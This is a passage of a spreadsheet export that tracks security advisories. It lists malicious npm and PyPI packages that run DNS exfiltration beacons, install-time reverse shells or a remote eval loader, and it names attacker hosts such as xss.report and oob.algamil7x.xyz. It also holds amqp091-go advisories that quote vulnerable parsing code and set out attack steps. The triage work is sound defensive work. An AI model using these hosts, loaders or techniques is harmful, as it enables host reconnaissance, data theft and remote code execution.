The package impersonates the Tink open-banking SDK (name @tink/tink-link-core, description 'Enterprise-grade client core for open banking', homepage github.com/tink-link/core) but its actual behavior is host reconnaissance and DNS exfiltration. The package.json install script runs `node index.js`, and both the install entry and main entry load lib/core.js, which reads os.userInfo().username, os.hostname(), and process.cwd(), joins them with a prefix and a hardcoded domain as DNS labels, and issues a dns.resolve4() lookup. The destination hostname and module/API names are reconstructed at runtime from hex byte arrays via Buffer.from(...).toString('utf8') in lib/b02e30.js and lib/6ad264.js — the decoded domain is oob.algamil7x.xyz and the label prefix is tinkcore. Module names 'os','dns','process' and API names 'userInfo','hostname','cwd','resolve4' are loaded via module.constructor._load with hex-decoded strings to hide them from static review. DNS-based egress bypasses HTTP proxy and firewall controls. The beacon fires automatically on `npm install` (via the install lifecycle script) and again on `require()` of the package, giving the attacker installer username, hostname, and current working directory for every affected environment.
</t>
        </is>
      </c>
      <c r="T1062" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16270</t>
        </is>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1063" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1063" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16271</t>
        </is>
      </c>
      <c r="D1063" s="5" t="inlineStr"/>
      <c r="E1063" s="5" t="inlineStr"/>
      <c r="F1063" s="5" t="inlineStr"/>
      <c r="G1063" s="5" t="inlineStr"/>
      <c r="H1063" s="5" t="inlineStr"/>
      <c r="I1063" s="5" t="inlineStr"/>
      <c r="J1063" s="5" t="inlineStr"/>
      <c r="K1063" s="5" t="inlineStr"/>
      <c r="L1063" s="5" t="inlineStr">
        <is>
          <t>npm:test89078-auth</t>
        </is>
      </c>
      <c r="M1063" s="5" t="inlineStr"/>
      <c r="N1063" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1063" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1063" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1063" s="5" t="inlineStr"/>
      <c r="R1063" s="5" t="inlineStr"/>
      <c r="S1063" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c1ac938360c682e2489d11de9278697e7e2e85d73c612d2ab60ed28553bb5573)
The package's preinstall script (scripts.preinstall = 'node index.js') runs automatically on npm install and collects os.userInfo().username and os.hostname(), then issues a dns.lookup against a subdomain of 31ee29fe-db68-4fd3-86a2-2b707b9e95f0.dnshook.site with the username and hostname embedded in the queried label. This is a DNS-based exfiltration beacon: installing the package transmits installer host identifiers to a non-first-party canary domain over DNS resolution at install time. The version number 99.99.99 and package name shape are consistent with a dependency-confusion lure targeting an internal package name.
</t>
        </is>
      </c>
      <c r="T1063" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16271</t>
        </is>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1064" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1064" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16273</t>
        </is>
      </c>
      <c r="D1064" s="5" t="inlineStr"/>
      <c r="E1064" s="5" t="inlineStr"/>
      <c r="F1064" s="5" t="inlineStr"/>
      <c r="G1064" s="5" t="inlineStr"/>
      <c r="H1064" s="5" t="inlineStr"/>
      <c r="I1064" s="5" t="inlineStr"/>
      <c r="J1064" s="5" t="inlineStr"/>
      <c r="K1064" s="5" t="inlineStr"/>
      <c r="L1064" s="5" t="inlineStr">
        <is>
          <t>npm:blue-string-formatter-utils</t>
        </is>
      </c>
      <c r="M1064" s="5" t="inlineStr"/>
      <c r="N1064" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1064" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1064" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q1064" s="5" t="inlineStr"/>
      <c r="R1064" s="5" t="inlineStr"/>
      <c r="S1064" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (aa3c9f5edcc636fc8d38e40a6bb225aed8f6b638be31f2abf8b6e747212c9565)
The package advertises itself as 'Utility helpers for string formatting' but its shipped main file performs a single behavior: an XMLHttpRequest GET to the protocol-relative URL //xss.report/c/k3rne111 whose response body is passed directly to eval(). Any require()/import of this package causes arbitrary attacker-controlled JavaScript from xss.report to execute in the consumer's Node process, with no pinning, no integrity check, and no relationship to the advertised functionality. The mismatch between the package's stated purpose (string utilities) and its actual contents (a remote-code loader) is a cover-story pattern.
</t>
        </is>
      </c>
      <c r="T1064" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16273</t>
        </is>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1065" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1065" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16274</t>
        </is>
      </c>
      <c r="D1065" s="5" t="inlineStr"/>
      <c r="E1065" s="5" t="inlineStr"/>
      <c r="F1065" s="5" t="inlineStr"/>
      <c r="G1065" s="5" t="inlineStr"/>
      <c r="H1065" s="5" t="inlineStr"/>
      <c r="I1065" s="5" t="inlineStr"/>
      <c r="J1065" s="5" t="inlineStr"/>
      <c r="K1065" s="5" t="inlineStr"/>
      <c r="L1065" s="5" t="inlineStr">
        <is>
          <t>PyPI:requests-auroras</t>
        </is>
      </c>
      <c r="M1065" s="5" t="inlineStr"/>
      <c r="N1065" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q1065" s="5" t="inlineStr"/>
      <c r="R1065" s="5" t="inlineStr"/>
      <c r="S1065" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (afa39517de816c01400eef99ef6ebce1357910c217c5e0ff55e4a252ea15a4c5)
During installation, package starts a reverse shell.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-requests-triwes
Reasons (based on the campaign):
 - The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="T1065" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16274</t>
        </is>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1066" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1066" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16275</t>
        </is>
      </c>
      <c r="D1066" s="5" t="inlineStr"/>
      <c r="E1066" s="5" t="inlineStr"/>
      <c r="F1066" s="5" t="inlineStr"/>
      <c r="G1066" s="5" t="inlineStr"/>
      <c r="H1066" s="5" t="inlineStr"/>
      <c r="I1066" s="5" t="inlineStr"/>
      <c r="J1066" s="5" t="inlineStr"/>
      <c r="K1066" s="5" t="inlineStr"/>
      <c r="L1066" s="5" t="inlineStr">
        <is>
          <t>PyPI:requests-triwes</t>
        </is>
      </c>
      <c r="M1066" s="5" t="inlineStr"/>
      <c r="N1066" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1066" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1066" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q1066" s="5" t="inlineStr"/>
      <c r="R1066" s="5" t="inlineStr"/>
      <c r="S1066" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (fa01be0759de95b7a1628930718f7b3bf372eff0c777aace419196e327e77078)
During installation, package starts a reverse shell.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-requests-triwes
Reasons (based on the campaign):
 - The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="T1066" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16275</t>
        </is>
      </c>
    </row>
    <row r="1067">
      <c r="A1067" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B1067" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77411</t>
        </is>
      </c>
      <c r="D1067" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E1067" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1067" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1067" s="5" t="inlineStr"/>
      <c r="H1067" s="5" t="inlineStr"/>
      <c r="I1067" s="5" t="inlineStr"/>
      <c r="J1067" s="5" t="inlineStr"/>
      <c r="K1067" s="5" t="inlineStr"/>
      <c r="L1067" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M1067" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N1067" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1067" s="5" t="inlineStr"/>
      <c r="P1067" s="5" t="inlineStr"/>
      <c r="Q1067" s="5" t="inlineStr"/>
      <c r="R1067" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="S1067" s="5" t="inlineStr">
        <is>
          <t>**Summary**
A critical stream desynchronization vulnerability has been identified in the AMQP wire-protocol parser. When parsing a long string (`readLongstr`) within a table field, providing a length that exceeds the maximum signed 32-bit integer (`2^31 - 1`, or roughly `2.1` GiB) triggers an improper error-handling condition. The parser abruptly aborts the read and returns a success status (`"",nil`) without consuming the specified bytes from the underlying network buffer. This causes all subsequent read operations to become misaligned. The parser interprets arbitrary offsets within the remaining payload bytes as valid AMQP frame headers, leading to potential Remote Code Execution (RCE), data injection, or complete connection hijacking.
**Vulnerability Details**
The vulnerability exists within the bounds-checking logic of the readLongstr function:
```go
// read.go:113-114 — silent no-op return, bytes left in stream
if length &gt; (^uint32(0) &gt;&gt; 1) {
    return  // returns "", nil, does NOT consume `length` bytes
}
```
When `length` evaluates to a value greater than `0x7FFFFFFF`:
1. The function executes a silent `return` statement.
2. Because Go utilizes named or zero-value initialization for unassigned return registers, this yields `"", nil` (indicating a successful read of an empty string).
3. The Critical Failure: The reader's cursor is not advanced by `length` bytes. The malformed payload remains sitting in the TCP/buffer stream.
**Impact**
As `readTable` continues iterating over the stream under the assumption that the string was successfully parsed, the byte alignment is entirely broken.
- Parser Desynchronization: Future AMQP frame headers are read from arbitrary offsets inside the attacker-controlled message payload.
- Payload Reinterpretation: A malicious actor can carefully craft the trailing bytes of the initial payload to perfectly mimic valid AMQP frames (e.g., `connection.close`, `channel.open`, or message publishing frames), forcing the client/server to execute unintended actions.</t>
        </is>
      </c>
      <c r="T1067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77411</t>
        </is>
      </c>
    </row>
    <row r="1068">
      <c r="A1068" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B1068" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77405</t>
        </is>
      </c>
      <c r="D1068" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E1068" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1068" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1068" s="5" t="inlineStr"/>
      <c r="H1068" s="5" t="inlineStr"/>
      <c r="I1068" s="5" t="inlineStr"/>
      <c r="J1068" s="5" t="inlineStr"/>
      <c r="K1068" s="5" t="inlineStr"/>
      <c r="L1068" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M1068" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N1068" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1068" s="5" t="inlineStr"/>
      <c r="P1068" s="5" t="inlineStr"/>
      <c r="Q1068" s="5" t="inlineStr"/>
      <c r="R1068" s="5" t="inlineStr">
        <is>
          <t>CWE-316, CWE-326</t>
        </is>
      </c>
      <c r="S1068" s="5" t="inlineStr">
        <is>
          <t>## Summary
A structural security weakness exists in the AMQP client's TLS configuration generator (`tlsConfigFromURI`). When constructing a `*tls.Config` object from an `amqps://` connection URI, the library initializes the structure without explicitly defining the `MinVersion` field. 
While modern versions of the Go compiler toolchain (Go 1.18+) default the implicit minimum version to TLS 1.2, this security posture relies entirely on an implicit toolchain dependency. If the library is compiled using legacy Go toolchains (Go &lt; 1.18), or if a future toolchain introduces fallback behavior, the client could silently negotiate obsolete and insecure TLS 1.0 or TLS 1.1 protocols during connection handshakes with a compromised or malicious AMQP broker.
---
## Vulnerability Details
### Mechanism
The vulnerability lies in the lack of an explicit safety floor when assigning configurations inside the URI component:
```go
// Example within uri.go's tlsConfigFromURI
cfg := &amp;tls.Config{
    ServerName: host,
    // MinVersion is left completely unassigned (defaults to 0, or toolchain default)
}
```
In the Go standard library (`crypto/tls`), leaving `MinVersion: 0` instructs the runtime to choose the toolchain's default minimum. Prior to Go 1.18, this default allowed negotiation down to TLS 1.0. Relying on implicit compiler configurations violates secure coding practices by decoupling the library's security posture from its source code, leaving applications vulnerable based solely on how they are built.
### Impact
If a client application is built with a legacy compiler environment or a custom Go runtime, an attacker capable of executing a Man-in-the-Middle (MitM) attack can force the connection to downgrade to TLS 1.0 or 1.1. This exposes the AMQP protocol data stream to well-known cryptographic vulnerabilities (such as BEAST, POODLE, or SWEET32), allowing the attacker to decrypt or alter message payloads, connection parameters, and authentication credentials.
---
## Attack Vector
An attacker performing a network-level downgrade attack can intercept a client connection built under a legacy toolchain:
1. **Interception:** A client application compiled on a legacy pipeline attempts to establish an encrypted connection to an AMQP broker.
2. **Protocol Downgrade:** The attacker intercepts the TLS Client Hello handshake and forces a downgrade negotiation to TLS 1.0.
3. **Cryptographic Exploitation:** Because `MinVersion` was never explicitly locked to `tls.VersionTLS12` by the library, the client accepts the weak cipher suites, allowing the attacker to monitor or manipulate the underlying AMQP session data.</t>
        </is>
      </c>
      <c r="T1068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77405</t>
        </is>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B1069" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77408</t>
        </is>
      </c>
      <c r="D1069" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E1069" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1069" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1069" s="5" t="inlineStr"/>
      <c r="H1069" s="5" t="inlineStr"/>
      <c r="I1069" s="5" t="inlineStr"/>
      <c r="J1069" s="5" t="inlineStr"/>
      <c r="K1069" s="5" t="inlineStr"/>
      <c r="L1069" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M1069" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N1069" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1069" s="5" t="inlineStr"/>
      <c r="P1069" s="5" t="inlineStr"/>
      <c r="Q1069" s="5" t="inlineStr"/>
      <c r="R1069" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S1069" s="5" t="inlineStr">
        <is>
          <t>## Summary
A data integrity and protocol corruption vulnerability exists in the AMQP client's property serialization logic. When encoding AMQP short string (`shortstr`) fields—such as identifiers, routing strings, and content metadata—the length of the string is explicitly cast to a fixed-size 8-bit unsigned integer (`uint8`). 
If an application provides a property string exceeding 255 bytes, the length counter silently wraps around (e.g., a length of 300 wraps to 44). As a result, the parser writes only a truncated portion of the string into the outgoing connection buffer without returning an error. This leads to silent data corruption, broken RPC routing, and unpredictable broker-side state behavior.
---
## Vulnerability Details
### Mechanism
The vulnerability resides in the wire-level serialization logic for application publishing properties:
```go
// write.go:246
length := uint8(len(b))  // wraps silently when len(b) &gt; 255 (e.g., 300 -&gt; 44)
```
Because Go allows silent integer truncation during explicit type casting, lengths larger than $2^8 - 1$ lose their most significant bits. The underlying stream writer reads `length` to determine how many bytes to pull from the buffer. Because no error or boundary check accompanies this truncation, the application believes the full payload was transmitted successfully.
### Affected Properties
This truncation behavior affects every standard AMQP field serialized as a `shortstr`:
* `CorrelationId`
* `ReplyTo`
* `MessageId`
* `Expiration`
* `UserId`
* `AppId`
* `ContentType`
* `ContentEncoding`
* `Type`
### Impact
The critical consequence is **silent protocol desynchronization at the application layer**. The underlying TCP stream remains framed properly (because the shortened length matches the bytes written), but the business logic is corrupted. Distributed transactions, request-reply correlations, and tracing headers are truncated, causing downstream systems to drop messages or route them to incorrect consumers.
---
## Attack Vector
An attacker who can influence metadata fields processed by an upstream application (such as a user-supplied tracking ID or a long content-type header) can exploit this to break system components:
1. **Targeting RPC Routing:** A user passes a malicious or overly long `CorrelationId` of 300 bytes through an application endpoint.
2. **Silent Truncation:** The library wraps the length value to 44, transmitting only the first 44 bytes to the rabbitMQ broker.
3. **Broken Correlation:** When the service processes the request and responds, the replying consumer attempts to route the message using the full 300-byte identifier. Because the broker only recognizes the truncated 44-byte ID, the reply loop breaks silently, leading to hanging processes or data leaks across transaction boundaries.</t>
        </is>
      </c>
      <c r="T1069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77408</t>
        </is>
      </c>
    </row>
    <row r="1070">
      <c r="A1070" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1070" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77403</t>
        </is>
      </c>
      <c r="D1070" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E1070" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1070" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1070" s="5" t="inlineStr"/>
      <c r="H1070" s="5" t="inlineStr"/>
      <c r="I1070" s="5" t="inlineStr"/>
      <c r="J1070" s="5" t="inlineStr"/>
      <c r="K1070" s="5" t="inlineStr"/>
      <c r="L1070" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M1070" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N1070" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1070" s="5" t="inlineStr"/>
      <c r="P1070" s="5" t="inlineStr"/>
      <c r="Q1070" s="5" t="inlineStr"/>
      <c r="R1070" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S1070" s="5" t="inlineStr">
        <is>
          <t>## Summary
A Denial of Service (DoS) vulnerability exists in the AMQP client's connection negotiation logic. The AMQP specification explicitly mandates a strict minimum frame size of 4096 bytes to prevent pathological packet fragmentation. While the library defines a `frameMinSize = 4096` constant, the connection negotiation loop fails to enforce this boundary, blindly accepting whatever maximum frame size (`FrameMax`) the server advertises during the handshake.
If a client connects to a malicious or compromised AMQP broker that advertises an extremely low `FrameMax` (such as 1 byte), the negotiation succeeds. Consequently, every subsequent message transmission is forced to splinter into thousands or millions of single-byte frames, causing massive CPU overhead, thread contention, and a near-instantaneous application freeze.
---
## Vulnerability Details
### Mechanism
During the connection establishment phase, the client and server negotiate connection parameters—including maximum channel count, heartbeat intervals, and maximum frame sizes. The vulnerability is located where the client accepts the server's tuning parameters:
```go
// Connection negotiation logic maps server values directly without validation
if serverSettings.FrameMax &gt; 0 {
    // VULNERABILITY: Lacks a floor validation check against frameMinSize (4096)
    c.config.FrameMax = serverSettings.FrameMax 
}
```
Because there is no conditional check asserting that `serverSettings.FrameMax &gt;= frameMinSize`, a value below the protocol specification floor is successfully registered. When the application later passes data payloads to the frame writer, the chunking algorithm splits the payload using the negotiated `FrameMax` value as its chunk window divisor.
### Impact
When `FrameMax` is set to an absurdly low threshold (e.g., 1 to 10 bytes):
* A standard 10 KiB message payload requires tens of thousands of individual write operations and frame headers.
* The system's CPU becomes entirely bound by frame serialization, memory allocation for frame structures, and context switching within the network output loops.
* This results in an application-layer Denial of Service (DoS) affecting not just the specific AMQP connection, but potentially the entire host system due to CPU resource starvation.
---
## Attack Vector
An attacker who compromises an upstream AMQP broker, performs a Man-in-the-Middle (MitM) interception, or tricks an application into connecting to an unauthorized external rogue broker can trigger this vulnerability:
1. **Rogue Handshake:** The client application connects to an AMQP endpoint controlled by the attacker.
2. **Malicious Parameter Tuning:** During the `connection.tune` phase, the rogue server returns a `FrameMax` value of `1`.
3. **Resource Exhaustion Trigger:** The client completes the handshake successfully. As soon as the client attempts to publish a message or process traffic, the internal loop fragments the data into single-byte frames, spiking the host's CPU usage to 100% and disabling the application thread.</t>
        </is>
      </c>
      <c r="T1070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77403</t>
        </is>
      </c>
    </row>
    <row r="1071">
      <c r="A1071" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1071" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77410</t>
        </is>
      </c>
      <c r="D1071" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E1071" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1071" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1071" s="5" t="inlineStr"/>
      <c r="H1071" s="5" t="inlineStr"/>
      <c r="I1071" s="5" t="inlineStr"/>
      <c r="J1071" s="5" t="inlineStr"/>
      <c r="K1071" s="5" t="inlineStr"/>
      <c r="L1071" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M1071" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N1071" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1071" s="5" t="inlineStr"/>
      <c r="P1071" s="5" t="inlineStr"/>
      <c r="Q1071" s="5" t="inlineStr"/>
      <c r="R1071" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="S1071" s="5" t="inlineStr">
        <is>
          <t>**Summary**
A flaw in the `recvContent` function allows a malicious AMQP server to trigger an Out-of-Memory (OOM) error, forcing the host operating system or container runtime to immediately terminate the client process.
**Vulnerability Details**
When receiving message content payloads, the client processes the expected size from the content header framework. The `recvContent` function attempts to optimize performance by pre-allocating memory for the message body based on the `ch.header.Size` field, which is a 64-bit unsigned integer (`uint64`).
```go
// channel.go:495-496
if cap(ch.body) == 0 {
    ch.body = make([]byte, 0, ch.header.Size)  // unbounded
}
```
The underlying library fails to validate or cap this requested size against any upper boundary—such as the maximum frame size negotiated during connection establishment (`FrameMax`). If a server specifies an extreme body size (e.g., `2^62` bytes), the Go runtime attempts to allocate an exabyte-scale slice capacity. This immediately exhausts available system memory, causing the operating system's OOM killer to terminate the application.
**Attack Vector / Exploitation Scenario**
- Message Delivery Phase: A malicious or compromised AMQP broker sends a standard `basic.deliver` frame containing a content header with an intentionally inflated `body-size` variable.
- Authentication Requirement: No special privileges or authentication bypasses are required; the crash occurs seamlessly during normal message consumption.
**Impact**
- Availability: High. Exploded memory consumption results in an instant process termination, destroying application state and availability for all threads sharing the environment.</t>
        </is>
      </c>
      <c r="T1071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77410</t>
        </is>
      </c>
    </row>
    <row r="1072">
      <c r="A1072" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1072" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77412</t>
        </is>
      </c>
      <c r="D1072" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E1072" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1072" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1072" s="5" t="inlineStr"/>
      <c r="H1072" s="5" t="inlineStr"/>
      <c r="I1072" s="5" t="inlineStr"/>
      <c r="J1072" s="5" t="inlineStr"/>
      <c r="K1072" s="5" t="inlineStr"/>
      <c r="L1072" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M1072" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N1072" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1072" s="5" t="inlineStr"/>
      <c r="P1072" s="5" t="inlineStr"/>
      <c r="Q1072" s="5" t="inlineStr"/>
      <c r="R1072" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S1072" s="5" t="inlineStr">
        <is>
          <t>**Summary**
A vulnerability in the readField function allows a malicious or compromised AMQP server to trigger an unhandled runtime panic in the client application, leading to an immediate crash of the entire process.
**Details**
When parsing incoming AMQP frames, the `readField` function processes byte-array fields (type tag `'x'`) by reading a 32-bit big-endian integer to determine the length of the data payload.
```go
// read.go:253-263
case 'x':
    var len int32
    if err = binary.Read(r, binary.BigEndian, &amp;len); err != nil {
        return nil, err
    }
    value := make([]byte, len)  // PANICS if len &lt; 0
```
If a server transmits a length value of `0xFFFFFFFF`, it is interpreted by the client as a signed 32-bit integer with a value of `-1`. Passing a negative integer to Go's built-in make() function for slice allocation triggers an unrecoverable runtime panic (panic: len out of range).
Because the reader goroutine handles network I/O without an explicit recover() wrapper, this panic propagates up to the runtime root, abruptly terminating the host application.
**Attack Vector / Exploitation Scenario**
An attacker capable of spoofing, compromising, or controlling an AMQP broker can exploit this flaw during two primary phases:
1. Connection Establishment: Sending a malicious connection.start handshake frame containing server-properties with an 'x' type field assigned a negative length.
2. Message Delivery: Delivering a message payload where the header table contains a malformed field matching the criteria above.
**Impact**
Availability: High. A single malformed frame can reliably crash the client process, resulting in a persistent Denial of Service (DoS) if the client automatically reconnects and receives the same payload.</t>
        </is>
      </c>
      <c r="T1072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77412</t>
        </is>
      </c>
    </row>
    <row r="1073">
      <c r="A1073" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1073" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1073" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75516</t>
        </is>
      </c>
      <c r="D1073" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E1073" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1073" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1073" s="5" t="inlineStr"/>
      <c r="H1073" s="5" t="inlineStr"/>
      <c r="I1073" s="5" t="inlineStr"/>
      <c r="J1073" s="5" t="inlineStr"/>
      <c r="K1073" s="5" t="inlineStr"/>
      <c r="L1073" s="5" t="inlineStr">
        <is>
          <t>maven:com.rabbitmq:amqp-client</t>
        </is>
      </c>
      <c r="M1073" s="5" t="inlineStr">
        <is>
          <t>5.34.0</t>
        </is>
      </c>
